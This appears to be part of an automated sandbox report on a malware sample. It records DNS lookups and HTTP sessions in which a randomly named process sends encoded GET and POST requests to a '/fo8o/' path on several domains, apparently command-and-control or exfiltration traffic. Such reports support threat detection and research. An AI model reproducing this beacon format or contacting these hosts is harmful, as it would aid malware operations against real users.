                                                                            Nov 25, 2024 14:00:14.673930883 CET4999280192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:15.692924023 CET4999380192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:15.815735102 CET8049993195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:15.815850973 CET4999380192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:15.818893909 CET4999380192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:15.939007998 CET8049993195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:17.173274994 CET8049993195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:17.173939943 CET8049993195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:17.173996925 CET4999380192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:17.330092907 CET4999380192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:18.348663092 CET4999480192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:18.468697071 CET8049994195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:18.471292973 CET4999480192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:18.473773956 CET4999480192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:18.595228910 CET8049994195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:18.595259905 CET8049994195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:19.957062960 CET8049994195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:19.957274914 CET8049994195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:19.957461119 CET4999480192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:19.986550093 CET4999480192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:21.006345034 CET4999580192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:21.126399040 CET8049995195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:21.126512051 CET4999580192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:21.129354000 CET4999580192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:21.249666929 CET8049995195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:22.539127111 CET8049995195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:22.539376974 CET8049995195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:22.539513111 CET4999580192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:22.542223930 CET4999580192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:22.665601015 CET8049995195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:44.833990097 CET4999680192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:44.954013109 CET8049996217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:44.954108953 CET4999680192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:44.956372976 CET4999680192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:45.077910900 CET8049996217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:46.264550924 CET8049996217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:46.264569044 CET8049996217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:46.264648914 CET4999680192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:46.471210003 CET4999680192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:47.490482092 CET4999780192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:47.610723972 CET8049997217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:47.610827923 CET4999780192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:47.613682032 CET4999780192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:47.735238075 CET8049997217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:48.947330952 CET8049997217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:48.948311090 CET8049997217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:48.948375940 CET4999780192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:49.127434969 CET4999780192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:50.169662952 CET4999880192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:50.290142059 CET8049998217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:50.290347099 CET4999880192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:50.292552948 CET4999880192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:50.413336039 CET8049998217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:50.414463997 CET8049998217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:51.550539017 CET8049998217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:51.550874949 CET8049998217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:51.550940990 CET4999880192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:51.799233913 CET4999880192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:52.967183113 CET4999980192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:53.088361025 CET8049999217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:53.088454962 CET4999980192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:53.091805935 CET4999980192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:53.211870909 CET8049999217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:54.381639004 CET8049999217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:54.381864071 CET8049999217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:54.382040024 CET4999980192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:54.387250900 CET4999980192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:54.580842972 CET8049999217.196.55.202192.168.2.11
DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 13:57:28.021522999 CET | 192.168.2.11 | 1.1.1.1 | 0x6d9f | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:57:45.554446936 CET | 192.168.2.11 | 1.1.1.1 | 0x940b | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:57:54.133539915 CET | 192.168.2.11 | 1.1.1.1 | 0x8d91 | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:58:09.630122900 CET | 192.168.2.11 | 1.1.1.1 | 0x6c29 | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:58:17.927496910 CET | 192.168.2.11 | 1.1.1.1 | 0xdde9 | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:59:33.302844048 CET | 192.168.2.11 | 1.1.1.1 | 0xd34e | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:59:48.756108999 CET | 192.168.2.11 | 1.1.1.1 | 0x4fbf | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:59:57.006448030 CET | 192.168.2.11 | 1.1.1.1 | 0xd3ba | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:00:12.099365950 CET | 192.168.2.11 | 1.1.1.1 | 0x67e8 | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:00:27.553694010 CET | 192.168.2.11 | 1.1.1.1 | 0x95f5 | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:00:35.787493944 CET | 192.168.2.11 | 1.1.1.1 | 0xf128 | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:00:44.288427114 CET | 192.168.2.11 | 1.1.1.1 | 0xbfc7 | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:00:59.399292946 CET | 192.168.2.11 | 1.1.1.1 | 0xbe29 | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:01:08.755623102 CET | 192.168.2.11 | 1.1.1.1 | 0xcdb5 | Standard query (0) | www.k9vyp11no3.cfd | A (IP address) | IN (0x0001) | false
DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 13:57:28.816713095 CET | 1.1.1.1 | 192.168.2.11 | 0x6d9f | No error (0) | www.3xfootball.com |  | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:57:46.014693975 CET | 1.1.1.1 | 192.168.2.11 | 0x940b | Name error (3) | www.kasegitai.tokyo | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:57:54.888262033 CET | 1.1.1.1 | 192.168.2.11 | 0x8d91 | No error (0) | www.goldenjade-travel.com |  | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:58:09.872528076 CET | 1.1.1.1 | 192.168.2.11 | 0x6c29 | Name error (3) | www.antonio-vivaldi.mobi | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:58:18.717443943 CET | 1.1.1.1 | 192.168.2.11 | 0xdde9 | No error (0) | www.magmadokum.com | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 13:58:18.717443943 CET | 1.1.1.1 | 192.168.2.11 | 0xdde9 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 13:58:18.717443943 CET | 1.1.1.1 | 192.168.2.11 | 0xdde9 | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:59:33.624432087 CET | 1.1.1.1 | 192.168.2.11 | 0xd34e | No error (0) | www.rssnewscast.com |  | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:59:48.942253113 CET | 1.1.1.1 | 192.168.2.11 | 0x4fbf | Name error (3) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:59:57.714406967 CET | 1.1.1.1 | 192.168.2.11 | 0xd3ba | No error (0) | www.techchains.info |  | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:00:13.043665886 CET | 1.1.1.1 | 192.168.2.11 | 0x67e8 | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 14:00:13.043665886 CET | 1.1.1.1 | 192.168.2.11 | 0x67e8 | No error (0) | elettrosistemista.zip |  | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:00:27.730515003 CET | 1.1.1.1 | 192.168.2.11 | 0x95f5 | Name error (3) | www.donnavariedades.com | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:00:36.219679117 CET | 1.1.1.1 | 192.168.2.11 | 0xf128 | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:00:44.830367088 CET | 1.1.1.1 | 192.168.2.11 | 0xbfc7 | No error (0) | www.empowermedeco.com | empowermedeco.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 14:00:44.830367088 CET | 1.1.1.1 | 192.168.2.11 | 0xbfc7 | No error (0) | empowermedeco.com |  | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:00:59.642165899 CET | 1.1.1.1 | 192.168.2.11 | 0xbe29 | Name error (3) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:01:08.982534885 CET | 1.1.1.1 | 192.168.2.11 | 0xcdb5 | Name error (3) | www.k9vyp11no3.cfd | none | none | A (IP address) | IN (0x0001) | false
                                                                            • www.3xfootball.com
                                                                            • www.goldenjade-travel.com
                                                                            • www.magmadokum.com
                                                                            • www.rssnewscast.com
                                                                            • www.techchains.info
                                                                            • www.elettrosistemista.zip
                                                                            • www.empowermedeco.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49764 | 154.215.72.110 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe

Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:28.947613001 CET | 507 | OUT | GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.3xfootball.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 25, 2024 13:57:30.494777918 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 25 Nov 2024 12:57:30 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49822 | 116.50.37.244 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe

Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:55.013698101 CET | 794 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: zh=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPzNkqdqsHnYWjr0OG4iOjTwARZZMNmPWg==
Nov 25, 2024 13:57:56.584685087 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 25 Nov 2024 12:57:55 GMT
Connection: close
Content-Length: 315
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            2 | 192.168.2.11 | 49831 | 116.50.37.244 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 13:57:57.674516916 CET | 814 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.goldenjade-travel.com
                                                                            Origin: http://www.goldenjade-travel.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.goldenjade-travel.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: zh=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwbyU34pF8DGNkwr2CMK8E1A4746gpEjrVU=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            3 | 192.168.2.11 | 49838 | 116.50.37.244 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 13:58:00.331348896 CET | 1827 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.goldenjade-travel.com
                                                                            Origin: http://www.goldenjade-travel.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.goldenjade-travel.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: zh=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 [TRUNCATED]
                                                                            Nov 25, 2024 13:58:01.899795055 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=us-ascii
                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                            Date: Mon, 25 Nov 2024 12:58:01 GMT
                                                                            Connection: close
                                                                            Content-Length: 315
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            4 | 192.168.2.11 | 49844 | 116.50.37.244 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 13:58:03.039386988 CET | 514 | OUT | GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.goldenjade-travel.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 13:58:04.614001036 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=us-ascii
                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                            Date: Mon, 25 Nov 2024 12:58:04 GMT
                                                                            Connection: close
                                                                            Content-Length: 315
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            5 | 192.168.2.11 | 49880 | 85.159.66.93 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 13:58:18.842212915 CET | 773 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.magmadokum.com
                                                                            Origin: http://www.magmadokum.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Referer: http://www.magmadokum.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: zh=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R12DEcLFINyuuRBg+a9ZZtq7cTSSAHXLgsw==


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            6 | 192.168.2.11 | 49886 | 85.159.66.93 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 13:58:21.487127066 CET | 793 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.magmadokum.com
                                                                            Origin: http://www.magmadokum.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.magmadokum.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: zh=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5zeH0zwOmup314UqT4jyCuzmV6K+ohDMIM=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            7 | 192.168.2.11 | 49892 | 85.159.66.93 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 13:58:24.193815947 CET | 1806 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.magmadokum.com
                                                                            Origin: http://www.magmadokum.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.magmadokum.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: zh=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 [TRUNCATED]


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            8 | 192.168.2.11 | 49899 | 85.159.66.93 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 13:58:26.848601103 CET | 507 | OUT | GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.magmadokum.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 13:59:28.290719986 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            9 | 192.168.2.11 | 49984 | 91.195.240.94 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 13:59:33.946837902 CET | 776 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Referer: http://www.rssnewscast.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: zh=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8o99FatcD9gYBytX2sxiuFS7wzwZJcTrhQg==
                                                                            Nov 25, 2024 13:59:35.222839117 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                            date: Mon, 25 Nov 2024 12:59:35 GMT
                                                                            content-type: text/html
                                                                            content-length: 556
                                                                            server: Parking/1.0
                                                                            connection: close
